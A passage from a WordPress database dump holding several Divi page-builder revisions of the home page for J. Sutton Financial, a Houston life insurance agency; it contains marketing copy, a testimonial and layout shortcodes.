hover_enabled=\"0\" global_colors_info=\"{}\" background_color=\"rgba(0,0,0,0.08)\" sticky_enabled=\"0\" custom_padding=\"4px|||||\" min_height=\"377.5px\"][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" hover_enabled=\"0\" global_colors_info=\"{}\" column_structure=\"1_2,1_2\" sticky_enabled=\"0\"][et_pb_column type=\"1_2\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_image src=\"http://cmdev-site1.com/wp-content/uploads/2023/03/AdobeStock_379114373-scaled.jpg\" _builder_version=\"4.20.2\" _module_preset=\"default\" title_text=\"Young happy couple video call to family with laptop computer at\" hover_enabled=\"0\" sticky_enabled=\"0\"][/et_pb_image][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" hover_enabled=\"0\" global_colors_info=\"{}\" sticky_enabled=\"0\"]<h3>We have your back. And american income life has ours.</h3>[/et_pb_text][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"]<p>Sutton Financial offers Term Life, Whole Life and AD&amp;D (Accidental Death &amp; Dismemberment) insurance coverage issued by American Income Life, one of the country’s oldest insurers, or its subsidiary Globe Life. As a J. Sutton policyholder, you’ll get to enjoy the personal attention of a modern<br />life insurance agency and the feeling of comfort that<br />comes from having coverage you can trust.</p>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\" custom_padding=\"25px||0px|||\"][et_pb_row admin_label=\"Row\" _builder_version=\"4.20.2\" _module_preset=\"default\" hover_enabled=\"0\" global_colors_info=\"{}\" column_structure=\"1_2,1_2\" sticky_enabled=\"0\"][et_pb_column type=\"1_2\" _builder_version=\"4.20.2\" _module_preset=\"default\" hover_enabled=\"0\" global_colors_info=\"{}\" sticky_enabled=\"0\"][et_pb_text admin_label=\"Text\" _builder_version=\"4.20.2\" _module_preset=\"default\" hover_enabled=\"0\" global_colors_info=\"{}\" sticky_enabled=\"0\"]<h3>Just because something is essential, doesn’t mean it has to cost more than a cup of coffee</h3>[/et_pb_text][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"]<p>Your policy could start at just .67¢ a day.</p>[/et_pb_text][/et_pb_column][et_pb_column _builder_version=\"4.20.2\" _module_preset=\"default\" type=\"1_2\"][et_pb_image src=\"http://cmdev-site1.com/wp-content/uploads/2023/03/Two-Cups-of-coffee-to-go-scaled.jpg\" _builder_version=\"4.20.2\" _module_preset=\"default\" title_text=\"4463273 Two white paper cups of coffee on wooden table.\" hover_enabled=\"0\" sticky_enabled=\"0\" max_width=\"83%\" width=\"54%\" align=\"right\"][/et_pb_image][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" background_image=\"http://cmdev-site1.com/wp-content/uploads/2023/03/Cell-phone-subscribe-photo-New-Green-b3d04e-and-new-blue-3e5ac0.png\" global_colors_info=\"{}\" custom_padding=\"85px||0px|||\"][et_pb_row column_structure=\"1_2,1_2\" _builder_version=\"4.20.2\" _module_preset=\"default\" background_enable_image=\"off\" global_colors_info=\"{}\"][et_pb_column type=\"1_2\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_signup button_text=\"Subscribe to our Newsletter!\" _builder_version=\"4.20.2\" _module_preset=\"default\" hover_enabled=\"0\" global_colors_info=\"{}\" min_height=\"282px\" title=\"Share your email with us and every few weeks we\'ll send some life wisdom your way. \" sticky_enabled=\"0\"][/et_pb_signup][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\" custom_margin=\"||-63px|||\"][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_column type=\"4_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_blog posts_number=\"3\" include_categories=\"5\" use_manual_excerpt=\"off\" show_more=\"on\" show_author=\"off\" show_date=\"off\" show_categories=\"off\" show_excerpt=\"off\" _builder_version=\"4.20.2\" _module_preset=\"default\" hover_enabled=\"0\" global_colors_info=\"{}\" fullwidth=\"off\" sticky_enabled=\"0\"][/et_pb_blog][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" hover_enabled=\"0\" global_colors_info=\"{}\" background_color=\"rgba(0,0,0,0.08)\" sticky_enabled=\"0\"][et_pb_row admin_label=\"Row\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_column type=\"4_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"]<h2>Our promise to you:</h2>\n<ul>\n<li>We promise to provide dependable coverage backed by an industry leader</li>\n<li>We promise to treat you like more than just a policy number</li>\n<li>We will never stop learning and looking for ways to improve.</li>\n<li>We promise to provide you with support that\'s knowledgeable, caring and friendly</li>\n<li>We promise to try to make this insurance thing something you can enjoy.</li>\n</ul>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\" custom_padding=\"6px|||||\"][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_column type=\"4_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_testimonial author=\"Ehis - Houston, TX\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"]<p>\"I have always been curious about how life insurance worked; I knew it was something I wanted because I always hear positive things about it. When I spoke to Justin, he broke down the entire process for me. I had such a great experience I doubled my coverage within a month of signing up.\"</p>[/et_pb_testimonial][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" fullwidth=\"on\" theme_builder_area=\"post_content\" _builder_version=\"4.20.2\" _module_preset=\"default\"][/et_pb_section]','Home','','inherit','closed','closed','','138-revision-v1','','','2023-03-19 03:28:01','2023-03-19 03:28:01','',138,'http://cmdev-site1.com/?p=381',0,'revision','',0),(504,1,'2023-03-26 19:29:37','2023-03-26 19:29:37','[et_pb_section fb_built=\"1\" admin_label=\"section\" _builder_version=\"4.20.2\" background_image=\"http://cmdev-site1.com/wp-content/uploads/2023/03/Header-New-3-22-2023-Color-Adjusted-USE-scaled.jpg\" custom_padding=\"23px|||||\" global_colors_info=\"{}\" custom_margin=\"||9px|||\"][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_column type=\"4_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_menu _builder_version=\"4.20.2\" _module_preset=\"default\" hover_enabled=\"0\" sticky_enabled=\"0\" active_link_color=\"#3f3f3f\" menu_text_color=\"#000000\" menu_font_size=\"18px\" background_enable_color=\"off\"][/et_pb_menu][/et_pb_column][/et_pb_row][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_column type=\"4_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][dsm_typing_effect before_typing_effect=\"J. Sutton Financial\" _builder_version=\"4.20.2\" _module_preset=\"default\" hover_enabled=\"0\" global_colors_info=\"{}\" typing_effect=\", an Independent Agency for American Income Life Insurance Company  \" sticky_enabled=\"0\" header_text_color=\"#FFFFFF\" before_new_line=\"off\"][/dsm_typing_effect][et_pb_text admin_label=\"Text\" _builder_version=\"4.20.2\" _module_preset=\"default\" hover_enabled=\"0\" global_colors_info=\"{}\" text_text_color=\"#FFFFFF\" text_font_size=\"18px\" sticky_enabled=\"0\"]<p>J. Sutton Financial is headquartered in Houston, TX and serves multiple communities across the state.</p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_column type=\"4_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][dsm_button button_one_text=\"Learn More\" _builder_version=\"4.20.2\" _module_preset=\"default\" hover_enabled=\"0\" global_colors_info=\"{}\" button_two_text=\"Work for Us\" sticky_enabled=\"0\" button_alignment=\"center\" button_one_lightbox_close_color=\"#FFFFFF\" button_two_lightbox_close_color=\"#FFFFFF\" custom_button_one=\"on\" button_one_text_color=\"#000000\" button_one_bg_color=\"#ffffff\" button_one_bg_enable_color=\"on\" button_one_border_width=\"0px\" button_one_border_color=\"RGBA(255,255,255,0)\" custom_button_two=\"on\" button_two_text_color=\"#000000\" button_two_bg_color=\"#ffffff\" button_two_bg_enable_color=\"on\" button_two_border_color=\"RGBA(255,255,255,0)\" button_one_border_radius=\"14px\" button_two_border_radius=\"14px\" button_two_border_width=\"0px\"][/dsm_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" custom_margin=\"18px||-35px|||\" custom_padding=\"0px|||||\" global_colors_info=\"{}\"][et_pb_row admin_label=\"row\" _builder_version=\"4.20.2\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" min_height=\"187.1px\" custom_margin=\"-3px|auto|-74px|auto||\" custom_padding=\"2px||0px|||\" global_colors_info=\"{}\" column_structure=\"1_2,1_2\"][et_pb_column type=\"1_2\" _builder_version=\"4.16\" custom_padding=\"|||\" global_colors_info=\"{}\" custom_padding__hover=\"|||\"][dsm_perspective_image _builder_version=\"4.20.2\" _module_preset=\"default\" title_text=\"Umbrella Roll in Icon\" src=\"http://cmdev-site1.com/wp-content/uploads/2023/03/Umbrella-Roll-in-Icon.png\" hover_enabled=\"0\" sticky_enabled=\"0\"][/dsm_perspective_image][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"4.16\" custom_padding=\"|||\" global_colors_info=\"{}\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" hover_enabled=\"0\" global_colors_info=\"{}\" sticky_enabled=\"0\" custom_margin=\"||18px|||\" custom_padding=\"57px|||||\"]<h2><strong>Providing Premium Life Insurance<br />Policies to Americans Nationwide</strong></h2>[/et_pb_text][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" hover_enabled=\"0\" sticky_enabled=\"0\" custom_margin=\"-7px|||||\"]<p>Sutton Financial provides high quality life insurance policies to Texans. Our agents proudly serve individuals from all walks of life, and can help you choose the right insurance policy to protect you and yours for years to come. J. Sutton Financial agents take pride in being approachable and easy to work with, helping you to make the right decisions for your family for decades to come.</p>[/et_pb_text][dsm_button _builder_version=\"4.20.2\" _module_preset=\"default\" button_one_text=\"Learn More\" button_alignment=\"center\" hover_enabled=\"0\" sticky_enabled=\"0\"][/dsm_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" custom_padding=\"25px||0px|||\" hover_enabled=\"0\" global_colors_info=\"{}\" background_color=\"#cccac7\" sticky_enabled=\"0\"][et_pb_row column_structure=\"1_2,1_2\" admin_label=\"Row\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_column type=\"1_2\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" hover_enabled=\"0\" sticky_enabled=\"0\" custom_padding=\"86px||0px|||\"]<h2><strong>Looking for a New Career? Learn How Arias Can Help Grow Your Future.</strong></h2>[/et_pb_text][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" hover_enabled=\"0\" sticky_enabled=\"0\" custom_padding=\"||0px|||\" text_font_size=\"16px\" text_text_color=\"#000000\"]<p>Sutton Financial is always looking for new, motivated talent to join our fun team of highly trained agents and managers. If you\'re looking to break out of the standard mold and take your career to the next level, look no further. Find out how you can grow together with J. Sutton Financial.</p>[/et_pb_text][dsm_button _builder_version=\"4.20.2\" _module_preset=\"default\" button_one_text=\"Apply Now!\" custom_button_one=\"on\" button_one_text_color=\"#000000\" hover_enabled=\"0\" sticky_enabled=\"0\" button_one_bg_color=\"#FFFFFF\" button_one_bg_enable_color=\"on\" button_alignment=\"center\" button_one_border_radius=\"14px\" button_one_border_width=\"0px\"][/dsm_button][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][dsm_perspective_image _builder_version=\"4.20.2\" _module_preset=\"default\" title_text=\"People Icon\" src=\"http://cmdev-site1.com/wp-content/uploads/2023/03/People-Icon.png\" hover_enabled=\"0\" sticky_enabled=\"0\"][/dsm_perspective_image][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" background_image=\"http://cmdev-site1.com/wp-content/uploads/2023/03/Downtown-Houston-skyline-Black-White-6139-x-2500-scaled.jpg\" custom_padding=\"85px||0px|||\" hover_enabled=\"0\" global_colors_info=\"{}\" title_text=\"Downtown Houston skyline\" sticky_enabled=\"0\"][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" min_height=\"199.3px\" custom_padding=\"||103px|||\"][et_pb_column _builder_version=\"4.20.2\" _module_preset=\"default\" type=\"4_4\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" hover_enabled=\"0\" sticky_enabled=\"0\" text_text_color=\"#FFFFFF\" custom_margin=\"||-4px|||\" custom_padding=\"112px|||||\"]<h2 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Proudly Headquartered in Houston, Texas</span></h2>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section]','Home','','inherit','closed','closed','','138-revision-v1','','','2023-03-26 19:29:37','2023-03-26 19:29:37','',138,'http://cmdev-site1.com/?p=504',0,'revision','',0),(380,1,'2023-03-19 03:23:17','2023-03-19 03:23:17','[et_pb_section fb_built=\"1\" fullwidth=\"on\" theme_builder_area=\"post_content\" _builder_version=\"4.20.2\" _module_preset=\"default\" title_text=\"City of Houston Skyline July 4th 2018 with dramatic sunset\" background_image=\"http://cmdev-site1.com/wp-content/uploads/2023/02/J-Sutton-Financial-Houston-Skyline-w-white-logo-edited-2-28-2023.jpg\" hover_enabled=\"0\" sticky_enabled=\"0\" custom_padding=\"||376px|||\"][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"section\" _builder_version=\"4.20.2\" background_image=\"http://cmdev-site1.com/wp-content/uploads/2023/03/New-Website-Header-No-Verbage-scaled.jpg\" custom_padding=\"23px|||||\" global_colors_info=\"{}\"][et_pb_row column_structure=\"1_2,1_2\" _builder_version=\"4.20.2\" _module_preset=\"default\" background_enable_image=\"off\" custom_padding=\"24px||146px|||\" global_colors_info=\"{}\" custom_margin=\"|auto|-52px|auto||\"][et_pb_column type=\"1_2\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" text_text_color=\"#FFFFFF\" custom_margin=\"||27px||false|false\" hover_enabled=\"0\" global_colors_info=\"{}\" header_font_size=\"54px\" sticky_enabled=\"0\" header_text_color=\"#FFFFFF\"]<h2><span style=\"color: #ffffff;\">Planning for a <em>better </em>financial future</span></h2>[/et_pb_text][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" hover_enabled=\"0\" sticky_enabled=\"0\"]<h3><span style=\"color: #000000;\">We\'re unlike other life insurance experiences you\'ve had.</span></h3>[/et_pb_text][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"]<p><span style=\"color: rgba(0, 0, 0, 0.85);\">J. Sutton Financial offers an easy way to get pricing for dependable and affordable term life insurance policy to help financially protect the people that are important to you. </span></p>[/et_pb_text][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\" custom_margin=\"18px||-35px|||\" custom_padding=\"0px|||||\"][et_pb_row admin_label=\"row\" _builder_version=\"4.20.2\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" min_height=\"187.1px\" custom_margin=\"-3px|auto|-74px|auto||\" global_colors_info=\"{}\" custom_padding=\"||0px|||\"][et_pb_column type=\"4_4\" _builder_version=\"4.16\" custom_padding=\"|||\" global_colors_info=\"{}\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"]<h2><strong>How much life insurance do you need?</strong></h2>[/et_pb_text][et_pb_code _builder_version=\"4.20.2\" _module_preset=\"default\" hover_enabled=\"0\" global_colors_info=\"{}\" sticky_enabled=\"0\"]<p><!-- [et_pb_line_break_holder] --> This is a placeholder for the coming form.  <!-- [et_pb_line_break_holder] --></p><!-- [et_pb_line_break_holder] -->[/et_pb_code][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" hover_enabled=\"0\" global_colors_info=\"{}\" background_color=\"rgba(0,0,0,0.08)\" sticky_enabled=\"0\" custom_padding=\"4px|||||\" min_height=\"377.5px\"][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" hover_enabled=\"0\" global_colors_info=\"{}\" column_structure=\"1_2,1_2\" sticky_enabled=\"0\"][et_pb_column type=\"1_2\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_image src=\"http://cmdev-site1.com/wp-content/uploads/2023/03/AdobeStock_379114373-scaled.jpg\" _builder_version=\"4.20.2\" _module_preset=\"default\" title_text=\"Young happy couple video call to family with laptop computer at\" hover_enabled=\"0\" sticky_enabled=\"0\"][/et_pb_image][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" hover_enabled=\"0\" global_colors_info=\"{}\" sticky_enabled=\"0\"]<h3>We have your back. And american income life has ours.</h3>[/et_pb_text][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"]<p>Sutton Financial offers Term Life, Whole Life and AD&amp;D (Accidental Death &amp; Dismemberment) insurance coverage issued by American Income Life, one of the country’s oldest insurers, or its subsidiary Globe Life. As a J. Sutton policyholder, you’ll get to enjoy the personal attention of a modern<br />life insurance agency and the feeling of comfort that<br />comes from having coverage you can trust.</p>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\" custom_padding=\"25px||0px|||\"][et_pb_row admin_label=\"Row\" _builder_version=\"4.20.2\" _module_preset=\"default\" hover_enabled=\"0\" global_colors_info=\"{}\" column_structure=\"1_2,1_2\" sticky_enabled=\"0\"][et_pb_column type=\"1_2\" _builder_version=\"4.20.2\" _module_preset=\"default\" hover_enabled=\"0\" global_colors_info=\"{}\" sticky_enabled=\"0\"][et_pb_text admin_label=\"Text\" _builder_version=\"4.20.2\" _module_preset=\"default\" hover_enabled=\"0\" global_colors_info=\"{}\" sticky_enabled=\"0\"]<h3>Just because something is essential, doesn’t mean it has to cost more than a cup of coffee</h3>[/et_pb_text][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"]<p>Your policy could start at just .67¢ a day.</p>[/et_pb_text][/et_pb_column][et_pb_column _builder_version=\"4.20.2\" _module_preset=\"default\" type=\"1_2\"][et_pb_image src=\"http://cmdev-site1.com/wp-content/uploads/2023/03/Two-Cups-of-coffee-to-go-scaled.jpg\" _builder_version=\"4.20.2\" _module_preset=\"default\" title_text=\"4463273 Two white paper cups of coffee on wooden table.\" hover_enabled=\"0\" sticky_enabled=\"0\" max_width=\"83%\" width=\"54%\" align=\"right\"][/et_pb_image][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" background_image=\"http://cmdev-site1.com/wp-content/uploads/2023/03/Cell-phone-subscribe-photo-New-Green-b3d04e-and-new-blue-3e5ac0.png\" global_colors_info=\"{}\" custom_padding=\"85px||0px|||\"][et_pb_row column_structure=\"1_2,1_2\" _builder_version=\"4.20.2\" _module_preset=\"default\" background_enable_image=\"off\" global_colors_info=\"{}\"][et_pb_column type=\"1_2\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_signup button_text=\"Subscribe to our Newsletter!\" _builder_version=\"4.20.2\" _module_preset=\"default\" hover_enabled=\"0\" global_colors_info=\"{}\" min_height=\"282px\" title=\"Share your email with us and every few weeks we\'ll send some life wisdom your way. \" sticky_enabled=\"0\"][/et_pb_signup][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\" custom_margin=\"||-63px|||\"][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_column type=\"4_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_blog posts_number=\"3\" include_categories=\"5\" use_manual_excerpt=\"off\" show_more=\"on\" show_author=\"off\" show_date=\"off\" show_categories=\"off\" show_excerpt=\"off\" _builder_version=\"4.20.2\" _module_preset=\"default\" hover_enabled=\"0\" global_colors_info=\"{}\" fullwidth=\"off\" sticky_enabled=\"0\"][/et_pb_blog][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" hover_enabled=\"0\" global_colors_info=\"{}\" background_color=\"rgba(0,0,0,0.08)\" sticky_enabled=\"0\"][et_pb_row admin_label=\"Row\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_column type=\"4_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"]<h2>Our promise to you:</h2>\n<ul>\n<li>We promise to provide dependable coverage backed by an industry leader</li>\n<li>We promise to treat you like more than just a policy number</li>\n<li>We will never stop learning and looking for ways to improve.</li>\n<li>We promise to provide you with support that\'s knowledgeable, caring and friendly</li>\n<li>We promise to try to make this insurance thing something you can enjoy.</li>\n</ul>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\" custom_padding=\"6px|||||\"][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_column type=\"4_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_testimonial author=\"Ehis - Houston, TX\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"]<p>\"I have always been curious about how life insurance worked; I knew it was something I wanted because I always hear positive things about it. When I spoke to Justin, he broke down the entire process for me. I had such a great experience I doubled my coverage within a month of signing up.\"</p>[/et_pb_testimonial][/et_pb_column][/et_pb_row][/et_pb_section]','Home','','inherit','closed','closed','','138-revision-v1','','','2023-03-19 03:23:17','2023-03-19 03:23:17','',138,'http://cmdev-site1.com/?p=380',0,'revision','',0),(387,1,'2023-03-19 03:39:50','2023-03-19 03:39:50','[et_pb_section fb_built=\"1\" fullwidth=\"on\" _builder_version=\"4.20.2\" _module_preset=\"default\" background_image=\"http://cmdev-site1.com/wp-content/uploads/2023/02/J-Sutton-Financial-Houston-Skyline-w-white-logo-edited-2-28-2023.jpg\" custom_padding=\"||376px|||\" global_colors_info=\"{}\"][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"section\" _builder_version=\"4.20.2\" background_image=\"http://cmdev-site1.com/wp-content/uploads/2023/03/New-Website-Header-No-Verbage-scaled.jpg\" custom_padding=\"23px|||||\" global_colors_info=\"{}\"][et_pb_row column_structure=\"1_2,1_2\" _builder_version=\"4.20.2\" _module_preset=\"default\" background_enable_image=\"off\" custom_margin=\"|auto|-52px|auto||\" custom_padding=\"24px||146px|||\" global_colors_info=\"{}\"][et_pb_column type=\"1_2\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" text_text_color=\"#FFFFFF\" header_text_color=\"#FFFFFF\" header_font_size=\"54px\" custom_margin=\"||27px||false|false\" global_colors_info=\"{}\"]<h2><span style=\"color: #ffffff;\">Planning for a <em>better </em>financial future</span></h2>[/et_pb_text][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"]<h3><span style=\"color: #000000;\">We\'re unlike other life insurance experiences you\'ve had.</span></h3>[/et_pb_text][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"]<p><span style=\"color: rgba(0, 0, 0, 0.85);\">J. Sutton Financial offers an easy way to get pricing for dependable and affordable term life insurance policy to help financially protect the people that are important to you. </span></p>[/et_pb_text][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" custom_margin=\"18px||-35px|||\" custom_padding=\"0px|||||\" global_colors_info=\"{}\"][et_pb_row admin_label=\"row\" _builder_version=\"4.20.2\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" min_height=\"187.1px\" custom_margin=\"-3px|auto|-74px|auto||\" custom_padding=\"||0px|||\" global_colors_info=\"{}\"][et_pb_column type=\"4_4\" _builder_version=\"4.16\" custom_padding=\"|||\" global_colors_info=\"{}\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"]<h2><strong>How much life insurance do you need?</strong></h2>[/et_pb_text][et_pb_code _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"]<p><!-- [et_pb_line_break_holder] --> This is a placeholder for the coming form.  <!-- [et_pb_line_break_holder] --></p><!-- [et_pb_line_break_holder] -->[/et_pb_code][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" background_color=\"rgba(0,0,0,0.05)\" min_height=\"377.5px\" custom_padding=\"4px|||||\" global_colors_info=\"{}\"][et_pb_row column_structure=\"1_2,1_2\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_column type=\"1_2\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_image src=\"http://cmdev-site1.com/wp-content/uploads/2023/03/AdobeStock_379114373-scaled.jpg\" title_text=\"Young happy couple video call to family with laptop computer at\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][/et_pb_image][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"]<h3>We have your back. And american income life has ours.</h3>[/et_pb_text][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"]<p>Sutton Financial offers Term Life, Whole Life and AD&amp;D (Accidental Death &amp; Dismemberment) insurance coverage issued by American Income Life, one of the country’s oldest insurers, or its subsidiary Globe Life. As a J. Sutton policyholder, you’ll get to enjoy the personal attention of a modern<br />life insurance agency and the feeling of comfort that<br />comes from having coverage you can trust.</p>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" custom_padding=\"25px||0px|||\" global_colors_info=\"{}\"][et_pb_row column_structure=\"1_2,1_2\" admin_label=\"Row\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_column type=\"1_2\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text admin_label=\"Text\" _builder_version=\"4.20.2\" _module_preset=\"default\" position_origin_r=\"top_right\" custom_margin=\"45px||45px||false|false\" global_colors_info=\"{}\"]<h3 style=\"text-align: left;\">Just because something is essential, doesn’t mean it has to cost more than a cup of coffee.</h3>\n<h4 style=\"text-align: left;\">Your policy could start at just .67¢ a day.</h4>[/et_pb_text][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_image src=\"http://cmdev-site1.com/wp-content/uploads/2023/03/Two-Cups-of-coffee-to-go-scaled.jpg\" title_text=\"4463273 Two white paper cups of coffee on wooden table.\" align=\"right\" _builder_version=\"4.20.2\" _module_preset=\"default\" width=\"54%\" max_width=\"83%\" 